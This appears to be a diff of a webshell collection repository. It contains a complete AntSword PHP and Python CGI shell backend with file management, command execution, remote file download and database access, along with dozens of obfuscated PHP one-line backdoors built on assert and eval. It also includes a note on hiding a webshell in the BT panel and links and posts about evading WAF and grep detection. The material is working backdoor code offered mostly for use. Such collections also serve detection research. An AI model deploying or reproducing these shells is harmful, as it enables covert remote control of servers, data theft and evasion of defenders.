    $FN=(m?stripslashes($fileOrDirPath):$fileOrDirPath);
    $TM=strtotime((m?stripslashes($newTime):$newTime));
    if(file_exists($FN)){
        return (@touch($FN,$TM,$TM)?"1":"0");
    }else{
        return ("0");
    }
 }
 function WgetCode($urlPath, $savePath){
    $fR=$urlPath;
    $fL=$savePath;
    $F=@fopen($fR,chr(114));
    $L=@fopen($fL,chr(119));
    if($F && $L){
        while(!feof($F))
            @fwrite($L,@fgetc($F));
        @fclose($F);
        @fclose($L);
        return "1";
    }else{
        return "0";
    }
 }
 function ExecuteCommandCode($cmdPath, $command){
    $p=$cmdPath;
    $s=$command;
    $d=dirname($_SERVER["SCRIPT_FILENAME"]);
    $c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
    $r="{$p} {$c}";
    @system($r." 2>&1",$ret);
    return ($ret!=0)?"ret={$ret}":"";
 }
 function probedb(){
    $ret="";
    $m=array(
        'mysql_close','mysqli_close','mssql_close','sqlsrv_close','ora_close','oci_close',
        'ifx_close','sqlite_close','pg_close','dba_close','dbmclose','filepro_fieldcount',
        'sybase_close'
    );
    foreach ($m as $f) {
        $ret.=($f."\t".(function_exists($f)?'1':'0')."\n");
    }
    if(function_exists('pdo_drivers')){
      foreach(@pdo_drivers() as $f){
        $ret.=("pdo_".$f."\t1\n");
      }
    }
    return $ret;
 }
 function listcmd($binarr){
    $ret="";
    $arr=@explode(",", $binarr);
    foreach($arr as $v){
        $ret.=($v."\t".(@file_exists($v)?"1":"0")."\n");
    }
    return $ret;
 }
@ini_set("display_errors", "0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
 $funccode = EC($_REQUEST[$pwd]);
 $z0 = EC(decode($_REQUEST['z0']));
 $z1 = EC(decode($_REQUEST['z1']));
 $z2 = EC(decode($_REQUEST['z2']));
 $z3 = EC(decode($_REQUEST['z3']));
 // echo "<meta HTTP-EQUIV=\"csontent-type\" content=\"text/html; charset={$cs}\">";
 echo "->"."|";
 $ret = "";
 try {
    switch ($funccode) {
        case 'A':
            $ret = BaseInfo();
            break;
        case 'B':
            $ret = FileTreeCode($z1);
            break;
        case 'C':
            $ret = ReadFileCode($z1);
            break;
        case 'D':
            $ret = WriteFileCode($z1, $z2);
            break;
        case 'E':
            $ret = DeleteFileOrDirCode($z1);
            break;
        case 'F':
            DownloadFileCode($z1);
            break;
        case 'U':
            $ret = UploadFileCode($z1, $z2);
            break;
        case 'H':
            $ret = CopyFileOrDirCode($z1, $z2);
            break;
        case 'I':
            $ret = RenameFileOrDirCode($z1, $z2);
            break;
        case 'J':
            $ret = CreateDirCode($z1);
            break;
        case 'K':
            $ret = ModifyFileOrDirTimeCode($z1, $z2);
            break;
        case 'L':
            $ret = WgetCode($z1, $z2);
            break;
        case 'M':
            $ret = ExecuteCommandCode($z1, $z2);
            break;
        case 'N':
            $ret = showDatabases($z0, $z1);
            break;
        case 'O':
            $ret = showTables($z0, $z1, $z2);
            break;
        case 'P':
            $ret = showColumns($z0, $z1, $z2, $z3);
            break;
        case 'Q':
            $ret = query($z0, $z1, $z2);
            break;
        case 'Y':
            $ret = listcmd($z1);
            break;
        case 'Z':
            $ret = probedb();
            break;
        default:
            // $ret = "Wrong Password";
            break;
    }
 } catch (Exception $e) {
    $ret = "ERROR://".$e;
 }
 echo $ret;
 echo "|"."<-";
 ?>
--- a/antSword-shells/python2_custom_script.py
+++ b/antSword-shells/python2_custom_script.py
@@ -0,0 +1,349 @@
 #!/usr/bin/env python
 # coding:utf-8
 from __future__ import print_function
 import os
 import cgi
 import time
 import stat
 import getpass
 import base64
 import binascii
 import shutil
 import urllib
 import platform
 import cgitb
 import sys
 cgitb.enable()
 reload(sys) 
 sys.setdefaultencoding('utf-8')
 VERSION = "0.0.2"
 u'''
              _   ____                       _
   __ _ _ __ | |_/ ___|_      _____  _ __ __| |
  / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
 | (_| | | | | |_ ___) \ V  V / (_) | | | (_| |
  \__,_|_| |_|\__|____/ \_/\_/ \___/|_|  \__,_|
 —————————————————————————————————————————————————
  AntSword Python2 CGI Custom Script No DataBase
     警告：
         此脚本仅供合法的渗透测试以及爱好者参考学习
          请勿用于非法用途，否则将追究其相关责任！
 —————————————————————————————————————————————————
 使用说明：
  1. AntSword >= v1.1-dev, Python == 2.x
  2. 创建 Shell 时选择 custom 模式连接
  3. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致，如果选择 default 则需要将 encoder 值设置为空
  4. 本脚本不含数据库管理操作
 使用方法:
  1. 修改 PWD, ENCODER, ENCODE
  2. 复制本脚本到 cgi-bin 目录下(根据中间件配置来定)
  3. 赋予可执行权限 chmod +x xxx.py
 CHANGELOG:
  Date 2018/12/30 v0.0.2
    1. 修复 windows 下命令执行参数问题
    2. 解决 windows 下文件名中文编码问题 (win10以下系统建议使用 gb2312 gbk 编码)
    3. 修复 windows 下获取当前用户获取不到时致命错误
  Date 2018/12/29 v0.0.1
    1. 文件系统 和 terminal 管理
    2. 支持 hex 和 base64 编码器
    3. 脚本内统一使用 unicode 编码来处理
 '''
 PWD = "ant"     # 连接密码
 ENCODER = ""    # 编码器, 3选1
 # ENCODER = "hex" # 推荐使用此编码器
 # ENCODER = "base64"
 ENCODE = "utf-8" # 字符编码
 OUT_PREFIX = "->" + "|" # 数据分割前缀符
 OUT_SUFFIX = "|" + "<-" # 数据分割后缀符
 def Decoder(enstr):
    u'''解码方法,解AntSword 编码器编码后的数据
@param enstr string 已经经过编码器编码的数据
@return ret string 解码后的数据
 '''
    if(ENCODER == "base64"):        
        return base64.b64decode(enstr)
    elif (ENCODER == "hex"):
        return binascii.a2b_hex(enstr)
    else:
        return enstr
 def TimeStampToTime(timestamp):
    timeStruct = time.localtime(timestamp)
    return time.strftime(u'%Y-%m-%d %H:%M:%S',timeStruct)
 def BaseInfo():
    u'''获取系统基础信息
@return ret string Shell或网站根目录\t盘符\tuname信息\t当前用户
 '''
    ret = ""
    d = os.path.dirname(os.environ.get('SCRIPT_FILENAME', ''))
    if(d == ""):
        d = os.getcwd()
    ret = "%s\t" % d
    if(d.startswith('/')):
        ret += "/"
    else:
        for L in range(ord('C'), ord('Z') + 1):
            if(os.path.isdir("%s:" % chr(L))):
                ret += "%s:" % chr(L)
    ret += "\t"
    ret += "%s\t" % ' '.join(platform.uname())
    if platform.system().lower() == 'windows':
        u = "Unknow" # windows 下没 pwd 使用 getpass.getuser 会出错
        for name in ('LOGNAME','USER','LNAME','USERNAME'):
            user = os.environ.get(name)
            if user:
                u = user
                break
        ret += u
    else:
        ret += getpass.getuser()
    return ret
 def FileTreeCode(d):
    u'''获取指定目录下的文件和目录信息
@param  d   string  文件路径
@return ret string  文件名\t创建时间\t文件大小\t文件权限(RWX 或 8进制)
 '''
    ret = u""
    # 如果文件名/目录是中文,则需要 encode 成系统的编码后再去处理
    if(os.path.exists(d.encode(ENCODE))):
        for fname in os.listdir(d.encode(ENCODE)):
            fname = fname.decode(ENCODE)
            p = os.path.join(d, fname)
            try:
                fst = os.stat(p.encode(ENCODE))
                name = fname
                if stat.S_ISDIR(fst.st_mode):
                    name += "/"
                ret += u"{}\t{}\t{}\t{}\n".format(name, TimeStampToTime(fst.st_mtime), fst.st_size, oct(fst.st_mode)[-4:])
            except:
                ret += u"{}\t{}\t{}\t{}\n".format(fname, TimeStampToTime(0), 0, 0)
    else:
        ret = "ERROR:// Path Not Found or No Permission!"
    return ret.encode(ENCODE)
 def ReadFileCode(fpath):
    u'''获取指定路径文件内容
@param fpath string 文件路径
@return ret string  成功返回文件内容,失败抛出异常
 '''
    with open(fpath.encode(ENCODE), 'r') as fp:
        return fp.read()
 def WriteFileCode(path, content):
    u'''向指定文件路径下写入content的内容
@param path    string 文件路径
@param content string 文件内容(整个文件内容)
@return ret string 成功返回 1 失败返回 0 或抛出异常
 '''
    with open(path.encode(ENCODE), "w") as fp:
        fp.write(content.encode(ENCODE))
    return "1"
 def DeleteFileOrDirCode(path):
    u'''删除指定路径下的文件或目录
@param path string 文件或目录路径
@return ret string 成功返回 1 失败返回 0 或抛出异常
 '''
    if os.path.isdir(path.encode(ENCODE)):
        shutil.rmtree(path.encode(ENCODE))
    else:
        os.remove(path.encode(ENCODE))
    return "1"
 def DownloadFileCode(path):
    u'''下载指定路径的文件
@param path   string 文件路径
@return None  直接在本方法内输出文件的二进制内容,失败则抛出异常
 '''
    with open(path.encode(ENCODE), 'r') as fp:
        print(fp.read(),end='')
 def UploadFileCode(path, content):
    u'''上传文件
@param path    string 文件路径 eg: /tmp/123
@param content hexstring 文件内容(分段) eg: 416e74 内容为 Ant
@return ret    string 成功返回 1 失败返回 0 或抛出异常
 '''
    data = binascii.a2b_hex(content)
    with open(path.encode(ENCODE), "a") as f:
        f.write(data)
    return "1"
 def CopyFileOrDirCode(oldPath, newPath):
    u'''复制文件或目录
@param oldPath string 原文件/目录路径 eg: /etc/passwd
@param newPath string 新文件/目录路径 eg: /tmp/passwd
@return ret    string 成功返回 1 失败返回 0 或抛出异常
 '''
    if os.path.isdir(oldPath.encode(ENCODE)):
        shutil.copytree(oldPath.encode(ENCODE), newPath.encode(ENCODE),symlinks=True)
    else:
        shutil.copy(oldPath.encode(ENCODE), newPath.encode(ENCODE))
    return "1"
 def RenameFileOrDirCode(oldPath, newPath):
    u'''重命名文件或目录
@param oldPath string 原文件/目录路径 eg: /tmp/123
@param newPath string 新文件/目录路径 eg: /tmp/456
@return ret    string 成功返回 1 失败返回 0 或抛出异常
 '''
    os.rename(oldPath.encode(ENCODE), newPath.encode(ENCODE))
    return "1"
 def CreateDirCode(path):
    u'''新建目录
@param path    string 新目录路径 eg: /tmp/123
@return ret    string 成功返回 1 失败返回 0 或抛出异常
 '''
    os.makedirs(path.encode(ENCODE))
    return "1"
 def ModifyFileOrDirTimeCode(path, newTime):
    u'''修改文件或目录的 最后一次修改时间
@param path    string 文件/目录路径 eg: /tmp/123
@param newTime string 时间字符串 eg: 2018-12-12 20:48:54
@return ret    string 成功返回 1 失败返回 0
 '''
    atime = int(time.mktime(time.strptime(newTime, '%Y-%m-%d %H:%M:%S')))
    os.utime(path.encode(ENCODE), (atime, atime))
    return "1"
 def WgetCode(url, savepath):
    u'''服务端 Wget
@param url      string url 地址 eg: http://xxx.com/1.jpg
@param savepath string 文件路径 eg: /tmp/2.jpg
@return ret    string 成功返回 1 失败返回 0
 '''
    urllib.urlretrieve(url, filename=savepath.encode(ENCODE))
    return "1"
 def ExecuteCommandCode(cmdPath, command):
    u'''执行命令
@param cmdPath string 执行命令的shell路径 eg: /bin/sh
@param command string 执行的命令内容 eg: cd "/usr/";pwd;whoami
@return ret string 执行命令返回结果
 '''
    d = os.path.dirname(os.environ.get('SCRIPT_FILENAME', ''))
    if(d == ""):
        d = os.getcwd()
    cmd = []
    if d[0] == "/":
        cmd = [cmdPath, '-c', '%s' % command]
    else:
        cmd = '''%s /c "%s"''' % (cmdPath, command)
    c_stdin, c_stdout, c_stderr = os.popen3(cmd)
    c_stdin.close()
    result = c_stdout.read()
    c_stdout.close()
    errmsg = c_stderr.read()
    c_stderr.close()
    return result + errmsg
 def showDatabases(encode, conf):
    u'''列出当前数据库系统下所有数据库
@param encode string 数据库连接编码 eg:utf8
@param conf string 连接字符串, 自己定义解析格式
@return ret   string 执行结果, \t 为字段分割符
 例如某连接下有3个数据库(mysql,test,information_schema),
 则返回结果为:
 mysql\ttest\tinformation_schema
 '''
    return "ERROR:// Not Implement"
 def showTables(encode, conf, dbname):
    u'''列出当前数据库下所有表
@param encode string 数据库连接编码 eg:utf8
@param conf string 连接字符串, 自己定义解析格式
@param dbname string 数据库名 eg: mysql
@return ret   string 执行结果, \t 为字段分割符
 例如某数据库下有3张表(user,admin,member),则返回结果为:
 user\tadmin\tmember
 '''
    return "ERROR:// Not Implement"
 def showColumns(encode, conf, dbname, table):
    u'''列出当前表下所有列
@param encode string 数据库连接编码 eg:utf8
@param conf   string 连接字符串, 自己定义解析格式
@param dbname string 数据库名 eg: mysql
@param table  string 表名    eg: user
@return ret   string 执行结果, \t 为字段分割符
 例如某张表有3个字段(id,user,password), 则返回数据如下:
 id\tuser\tpassword
 '''
    return "ERROR:// Not Implement"
 def query(encode, conf, sql):
    u'''执行 sql 语句
@param encode string 数据库连接编码 eg:utf8
@param conf   string 连接字符串, 自己定义解析格式
@param sql    string 要执行的sql语句
@return ret   string 执行结果, \t|\t 为列分割符, \r\n为行分割符, 第一行为列名
 例如某张表有3个字段(id,user,password), 查询的结果有2条数据,则返回数据如下:
 id\t|\tuser\t|\tpassword\r\n1\t|\tadmin\t|\t123456\r\n2\t|\tuser\t|\t123456\r\n
 '''
    return "ERROR:// Not Implement"
 if __name__ == "__main__":
    print("Content-Type: text/html;charset=%s" % ENCODE)
    print()
    print(OUT_PREFIX.decode(ENCODE), end='')
    ret = ""
    try:
        form = cgi.FieldStorage()
        funcode = form.getvalue(PWD)
        z0 = Decoder(form.getvalue("z0","").decode())
        z1 = Decoder(form.getvalue("z1","").decode())
        z2 = Decoder(form.getvalue("z2","").decode())
        z3 = Decoder(form.getvalue("z3","").decode())
        if(funcode == "A"):
            ret = BaseInfo()
        elif(funcode == "B"):
            ret = FileTreeCode(z1)
        elif(funcode == 'C'):
            ret = ReadFileCode(z1)
        elif(funcode == 'D'):
            ret = WriteFileCode(z1, z2)
        elif(funcode == 'E'):
            ret = DeleteFileOrDirCode(z1)
        elif(funcode == 'F'):
            DownloadFileCode(z1)
        elif(funcode == 'U'):
            ret = UploadFileCode(z1, z2)
        elif(funcode == 'H'):
            ret = CopyFileOrDirCode(z1, z2)
        elif(funcode == 'I'):
            ret = RenameFileOrDirCode(z1, z2)
        elif(funcode == 'J'):
            ret = CreateDirCode(z1)
        elif(funcode == 'K'):
            ret = ModifyFileOrDirTimeCode(z1, z2)
        elif(funcode == 'L'):
            ret = WgetCode(z1, z2)
        elif(funcode == 'M'):
            ret = ExecuteCommandCode(z1, z2)
        elif(funcode == 'N'):
            ret = showDatabases(z0, z1)
        elif(funcode == 'O'):
            ret = showTables(z0, z1, z2)
        elif(funcode == 'P'):
            ret = showColumns(z0, z1, z2, z3)
        elif(funcode == 'Q'):
            ret = query(z0, z1, z2)
        else:
            pass
    except Exception, e:
        ret = "ERROR:// %s" % getattr(e, 'strerror', str(e))
    print(ret, end="")
    print(OUT_SUFFIX.decode(ENCODE))
--- a/asp/webshell.asp
+++ b/asp/webshell.asp
@@ -39,7 +39,7 @@ end Function
 <%Response.Write(Request.ServerVariables("server_software"))%>
 </p>
 <p>
-<b>The server's software:</b>
+<b>The server's local address:</b>
 <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
 <% szCMD = request("cmd")
 thisDir = getCommandOutput("cmd /c" & szCMD)
--- a/backlion/webshell
+++ b/backlion/webshell
--- a/bartblaze/PHP-backdoors
+++ b/bartblaze/PHP-backdoors
--- a/bt_yincang_shell.md
+++ b/bt_yincang_shell.md
@@ -0,0 +1,18 @@
 bt 面板隐藏webshell小技巧
 最近宝塔的phpmyadmin，大家应该都已经知道了。我就不炒冷饭，最近也没有研究什么比较有含量的，就分享一个宝塔面板隐藏webshell的小技巧，比较水。
 创建一个文件名为```.<a.php```的文件
 ![image](https://mmbiz.qpic.cn/mmbiz_png/noZJ3Kqbu1cMNE3SHdMvFB36kcMbEWk8xjy4y3M4s8KQnT5tBHFiaO2p0AolDy0HBDsbBGZ3mcOeHicoyMic2bvIg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
 解压出来以后，宝塔的文件管理面板中是不会出现的
 ![](https://mmbiz.qpic.cn/mmbiz_png/noZJ3Kqbu1cMNE3SHdMvFB36kcMbEWk8ibRCosCwfqfehHput38DJicXQiaeLiaT2SIZFiaOribt3udemBmzK8glHiaicg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
 但是文件是存在的
 而且可以正常访问
 ![](https://mmbiz.qpic.cn/mmbiz_png/noZJ3Kqbu1cMNE3SHdMvFB36kcMbEWk8bDBrx4LOThfraAEQk7ribZibyKuUrdeC8GpWeibHXsmyGRb9zA6NzpoUg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
--- a/bypass.md
+++ b/bypass.md
@@ -0,0 +1,2 @@
 ### 1. [一个经典的过人 WebShell by tr0y](https://www.tr0y.wang/2020/07/14/webshell-bypass-human/)
 ### 2. [WebShell免杀 by 4hou.win](https://4hou.win/wordpress/?p=47975)
--- a/content/1个经典的过人
+++ b/content/1个经典的过人
--- a/content/Upload与WAF的那些事.pdf
+++ b/content/Upload与WAF的那些事.pdf
--- a/content/WebShell免杀.pdf
+++ b/content/WebShell免杀.pdf
--- a/content/Webshell免杀的思考与学习
+++ b/content/Webshell免杀的思考与学习
--- a/content/php马-bypass
+++ b/content/php马-bypass
--- a/content/readme.md
+++ b/content/readme.md
@@ -0,0 +1 @@
 ### 故名思意,收集一些方法技术pdf存档查看
--- a/content/webshell-detect-bypass
+++ b/content/webshell-detect-bypass
@@ -0,0 +1,3 @@
 share project bypass waf
 https://github.com/LandGrey/webshell-detect-bypass
--- a/content/从Webshell的视角谈攻防对抗
+++ b/content/从Webshell的视角谈攻防对抗
--- a/content/冰蝎，从入门到魔改.pdf
+++ b/content/冰蝎，从入门到魔改.pdf
--- a/content/冰蝎，从入门到魔改（续）.pdf
+++ b/content/冰蝎，从入门到魔改（续）.pdf
--- a/docs/CNAME
+++ b/docs/CNAME
@@ -1 +0,0 @@
 shell.endp.top
--- a/lcatro/PHP-WebShell-Bypass-WAF
+++ b/lcatro/PHP-WebShell-Bypass-WAF
--- a/lhlsec/webshell
+++ b/lhlsec/webshell
--- a/malwares/WebShell
+++ b/malwares/WebShell
--- a/oneoneplus/webshell
+++ b/oneoneplus/webshell
--- a/20
+++ b/20
@@ -1,20 +0,0 @@
 add other webshell collect repository
 url : https://github.com/tdifg/WebShell
 add public-shell repository
 url : https://github.com/BDLeet/public-shell
 add web-backdoors
 url : https://github.com/all3g/fuzzdb/tree/master/web-backdoors
 add web-shell
 url : https://github.com/BlackArch/webshells
 add webshellSample
 url : https://github.com/tanjiti/webshellSample
 add Ridter'Pentest backdoor tools
 url : https://github.com/Ridter/Pentest/tree/master/backdoor
 add xl7dev'WebShell
 https://github.com/xl7dev/WebShell  小乐天 From: Knownsec
--- a/repository.md
+++ b/repository.md
@@ -0,0 +1,27 @@
 add other webshell collect repository
 url : [https://github.com/tdifg/WebShell](https://github.com/tdifg/WebShell)
 add public-shell repository
 url : [https://github.com/BDLeet/public-shell](https://github.com/BDLeet/public-shell)
 add web-backdoors
 url : [https://github.com/all3g/fuzzdb/tree/master/web-backdoors](https://github.com/all3g/fuzzdb/tree/master/web-backdoors)
 add web-shell
 url : [https://github.com/BlackArch/webshells](https://github.com/BlackArch/webshells
 add webshellSample
 url : [https://github.com/tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
 add Ridter'Pentest backdoor tools
 url : [https://github.com/Ridter/Pentest/tree/master/backdoor](https://github.com/Ridter/Pentest/tree/master/backdoor)
 add xl7dev'WebShell
 url : [https://github.com/xl7dev/WebShell](https://github.com/xl7dev/WebShell)  小乐天 From: Knownsec
--- a/php/2020-08-31-01.php
+++ b/php/2020-08-31-01.php
@@ -0,0 +1 @@
 <?php $a="~+d()"^"!{+{}";$b=${$a}["a"];eval("".$b);?>
--- a/php/2020.08.20.01.php
+++ b/php/2020.08.20.01.php
@@ -0,0 +1,4 @@
 <?php 
    $a = substr('1a',1).'s'.'s'.'e'.'r'.'t';
    $a($_POST['x']);
 ?>
--- a/php/2020.08.20.02.php
+++ b/php/2020.08.20.02.php
@@ -0,0 +1,4 @@
 <?php 
    $a = strtr('azxcvt','zxcv','sser');
    $a($_POST['x']);
 ?>
--- a/php/2020.08.20.03.php
+++ b/php/2020.08.20.03.php
@@ -0,0 +1,4 @@
 <?php 
    $a = substr_replace("asxxx","sert",2);
    $a($_POST['x']);
 ?>  
--- a/php/2020.08.20.04.php
+++ b/php/2020.08.20.04.php
@@ -0,0 +1,4 @@
 <?php 
    $a = trim(' assert ');
    $a($_POST['x']);
 ?>
--- a/php/2020.08.20.05.php
+++ b/php/2020.08.20.05.php
@@ -0,0 +1,7 @@
 <?php 
    function sqlsec($a){
        $a($_POST['x']);
    }
    sqlsec(assert);
 ?>
--- a/php/2020.08.20.06.php
+++ b/php/2020.08.20.06.php
@@ -0,0 +1,6 @@
 <?php 
    function sqlsec($a){
        assert($a);
    }
    sqlsec($_POST['x']);
 ?>
--- a/php/2020.08.20.07.php
+++ b/php/2020.08.20.07.php
@@ -0,0 +1,3 @@
 <?php
    call_user_func('assert',$_POST['x']);
 ?>
--- a/php/2020.08.20.08.php
+++ b/php/2020.08.20.08.php
@@ -0,0 +1,3 @@
 <?php
    call_user_func_array(assert,array($_POST['x']));
 ?>
--- a/php/2020.08.20.09.php
+++ b/php/2020.08.20.09.php
@@ -0,0 +1,3 @@
 <?php
    array_filter(array($_POST['x']),'assert');
 ?>
--- a/php/2020.08.20.10.php
+++ b/php/2020.08.20.10.php
@@ -0,0 +1,5 @@
 <?php
    $e = $_REQUEST['e'];
    $arr = array($_POST['pass'],);
    array_filter($arr, base64_decode($e));
 ?>
--- a/php/2020.08.20.11.php
+++ b/php/2020.08.20.11.php
@@ -0,0 +1,5 @@
 <?php
    $e = $_REQUEST['e'];
    $arr = array($_POST['pass'],);
    array_map(base64_decode($e), $arr);
 ?>
--- a/php/2020.08.20.12.php
+++ b/php/2020.08.20.12.php
@@ -0,0 +1,9 @@
 <?php
    function sqlsec($value,$key)
    {   
        $x = $key.$value;
        $x($_POST['x']);
    }
    $a=array("ass"=>"ert");
    array_walk($a,"sqlsec");
 ?>
--- a/php/2020.08.20.13.php
+++ b/php/2020.08.20.13.php
@@ -0,0 +1,5 @@
 <?php 
  $e = $_REQUEST['e'];
  $arr = array($_POST['x'] => '|.*|e',);
    array_walk($arr, $e, '');
 ?>
--- a/php/2020.08.20.14.php
+++ b/php/2020.08.20.14.php
@@ -0,0 +1,28 @@
 <?php 
    mb_ereg_replace('\d', $_REQUEST['x'], '1', 'e');
 ?>
 <?php 
    preg_filter('|\d|e', $_REQUEST['x'], '2');
 ?>
 use like:
 ```
 <?php 
  $e = $_REQUEST['e'];
  $arr = array($_POST['x'] => '|.*|e',);
    array_walk($arr, $e, '');
 ?>
 此时提交如下 payload 的话：
 Php
 shell.php?e=preg_replace
 最后就相当于执行了如下语句：
 Php
 preg_replace('|.*|e',$_POST['x'],'')
 这个时候只需要 POST x=phpinfo();
 ```
--- a/php/2020.08.20.15.php
+++ b/php/2020.08.20.15.php
@@ -0,0 +1,3 @@
 <?php 
    mb_eregi_replace('\d', $_REQUEST['x'], '1', 'e');
 ?>
--- a/php/2020.08.20.16.php
+++ b/php/2020.08.20.16.php
@@ -0,0 +1,5 @@
 <?php
    $e = $_REQUEST['e'];
    $arr = array($_POST['pass'] => '|.*|e',);
    array_walk_recursive($arr, $e, '');
 ?>
--- a/php/2020.08.20.17.php
+++ b/php/2020.08.20.17.php
@@ -0,0 +1,62 @@
 <?php
    $e = $_REQUEST['e'];
    $arr = array(1);
    array_reduce($arr, $e, $_POST['x']);
 ?>
 post: e=assert&x=phpinfo();
 <?php
    $e = $_REQUEST['e'];
    $arr = array($_POST['x']);
    $arr2 = array(1);
    array_udiff($arr, $arr2, $e);
 ?>
 post: e=assert&x=phpinfo();
 <?php
    $e = $_REQUEST['e'];
    $arr = array('test', $_REQUEST['x']);
    uasort($arr, base64_decode($e));
 ?>
 post: e=YXNzZXJ0&x=phpinfo();
 <?php
   $arr = new ArrayObject(array('test', $_REQUEST['x']));
   $arr->uasort('assert');
 ?>
 <?php
    $e = $_REQUEST['e'];
    $arr = array('test' => 1, $_REQUEST['x'] => 2);
    uksort($arr, $e);
 ?>
 post: e=assert&x=phpinfo();
 <?php
   $arr = new ArrayObject(array('test' => 1, $_REQUEST['x'] => 2));
   $arr->uksort('assert');
 ?>
 <?php
    $e = $_REQUEST['e'];
    register_shutdown_function($e, $_REQUEST['x']);
 ?>
 <?php
    $e = $_REQUEST['e'];
    declare(ticks=1);
    register_tick_function ($e, $_REQUEST['x']);
 ?>
 <?php
    filter_var($_REQUEST['x'], FILTER_CALLBACK, array('options' => 'assert'));
 ?>
 <?php
    filter_var_array(array('test' => $_REQUEST['x']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
 ?>
--- a/php/2020.08.20.18.php
+++ b/php/2020.08.20.18.php
@@ -0,0 +1,4 @@
 <?php 
    $a = ('!'^'@').'s'.'s'.'e'.'r'.'t';
    $a($_POST['x']);
 ?>
--- a/php/2020.08.20.19.php
+++ b/php/2020.08.20.19.php
@@ -0,0 +1,6 @@
 <?php 
    $a = ('!'^'@').'s'.'s'.'e'.'r'.'t';
    $b='_'.'P'.'O'.'S'.'T';
    $c=$$b;
    $a($c['x']);
 ?>
--- a/php/2020.08.20.20.php
+++ b/php/2020.08.20.20.php
@@ -0,0 +1,4 @@
 <?php
 $e = $_REQUEST['e'];
 declare(ticks=1);
 register_tick_function ($e, $_REQUEST['x']);
--- a/php/Shu1337.php
+++ b/php/Shu1337.php
--- a/php/YXNzZXJ0YWE.php
+++ b/php/YXNzZXJ0YWE.php
@@ -0,0 +1,25 @@
 <?php
 /**
 * YXNzZXJ0YWE=
 */
 class Example
 {
    public function fn()
    {
    }
 }
 $reflector = new ReflectionClass('Example');
 $zhushi = substr(($reflector->getDocComment()), 7, 12);
 $zhushi = base64_decode($zhushi);
 $zhushi = substr($zhushi, 0, 6);
 //
 foreach (array('_POST','_GET') as $_request) {
    foreach ($$_request as $_key=>$_value) {
        $$_key=  $_value;
        print_r($$_request);
    }
 }
 $zhushi($_value);
--- a/php/ass.php
+++ b/php/ass.php
@@ -0,0 +1,9 @@
 <?php
 /**
 * Noticed: (PHP 5 >= 5.3.0, PHP 7)
 *
 */
 $password = "LandGrey";
 $wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
 forward_static_call_array($wx."ert", array($_REQUEST[$password]));
 ?>
--- a/php/bypass-with-base32.php
+++ b/php/bypass-with-base32.php
@@ -0,0 +1,69 @@
 <?php
 class ZQIH{
        public $a = null;
        public $b = null;
        public $c = null;
        function __construct(){
            if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
        $this->a = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
        $this->LGZOJH = @base32_decode($this->a);
        @eval/*sopupi3240-=*/("/*iSAC[FH*/".$this->LGZOJH."/*iSAC[FH*/");
        }}}
 new ZQIH();
 function base32_encode($input) {
    $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
    $output = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen($input); $i < $j; $i++) {
        $v <<= 8;
        $v += ord($input[$i]);
        $vbits += 8;
        while ($vbits >= 5) {
            $vbits -= 5;
            $output .= $BASE32_ALPHABET[$v >> $vbits];
            $v &= ((1 << $vbits) - 1);
        }
    }
    if ($vbits > 0) {
        $v <<= (5 - $vbits);
        $output .= $BASE32_ALPHABET[$v];
    }
    return $output;
 }
 function base32_decode($input) {
    $output = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen($input); $i < $j; $i++) {
        $v <<= 5;
        if ($input[$i] >= 'a' && $input[$i] <= 'z') {
            $v += (ord($input[$i]) - 97);
        } elseif ($input[$i] >= '2' && $input[$i] <= '7') {
            $v += (24 + $input[$i]);
        } else {
            exit(1);
        }
        $vbits += 5;
        while ($vbits >= 8) {
            $vbits -= 8;
            $output .= chr($v >> $vbits);
            $v &= ((1 << $vbits) - 1);
        }
    }
    return $output;
 }
 ?>
--- a/php/bypass2021-01-04-01.php
+++ b/php/bypass2021-01-04-01.php
@@ -0,0 +1,11 @@
 <?php
 function x()
 {
    return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/";
 }
 eval(x());
 ?>
--- a/php/cotent01.md
+++ b/php/cotent01.md
@@ -0,0 +1,377 @@
 Esse pequeno post é focado em uma das diferentes técnicas que venho estudando no PHP, mas direcionando no quesito de variação de código para backdoor web.
 O cenário de uso dos exemplos abaixo é um pensamento fora da caixa, dando exit() no básico usado em muitos códigos backdoor.
 Foquei nas variáveis globais GET ,POST ,REQUEST.
 #### As functions mais usadas:
 ```
 (PHP 4, PHP 5, PHP 7)
 shell_exec — Executa um comando via shell e retorna a saída inteira como uma string
 string shell_exec ( string $cmd )
 EXEC-> php -r 'shell_exec("ls -la");'
 (PHP 4, PHP 5, PHP 7)
 system — Executa um programa externo e mostra a saída
 string system ( string $command [, int &$return_var ] )
 EXEC-> php -r 'system("ls -la");'
 (PHP 4, PHP 5, PHP 7)
 exec — Executa um programa externo
 string exec ( string $command [, array &$output [, int &$return_var ]] )
 EXEC-> php -r 'exec("ls -la",$var);print_r($var);'
 (PHP 4, PHP 5, PHP 7)
 passthru — Executa um programa externo e mostra a saída crua
 void passthru ( string $command [, int &$return_var ] )
 EXEC-> php -r 'passthru("ls -la",$var);'
 ```
 #### Implementação simples:
 ```
 shell_exec: 
 if(isset($_REQUEST['cmd'])) { $cmd=shell_exec($_REQUEST['cmd']);
 print_r($cmd);} 
 system: 
 if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); }
 exec:
 if(isset($_REQUEST['cmd'])) { exec($_REQUEST['cmd']); }
 passthru:
 if(isset($_REQUEST['cmd'])) { passthru($_REQUEST['cmd']); } 
 ```
 Podemos usar as mesmas functions, porem de forma elaborada evitando que um simples grep -E revele nosso acesso.
 #### DICAS:
 - Uso de shellcode em valores fixos;
 - Array é vida! use sem moderação;
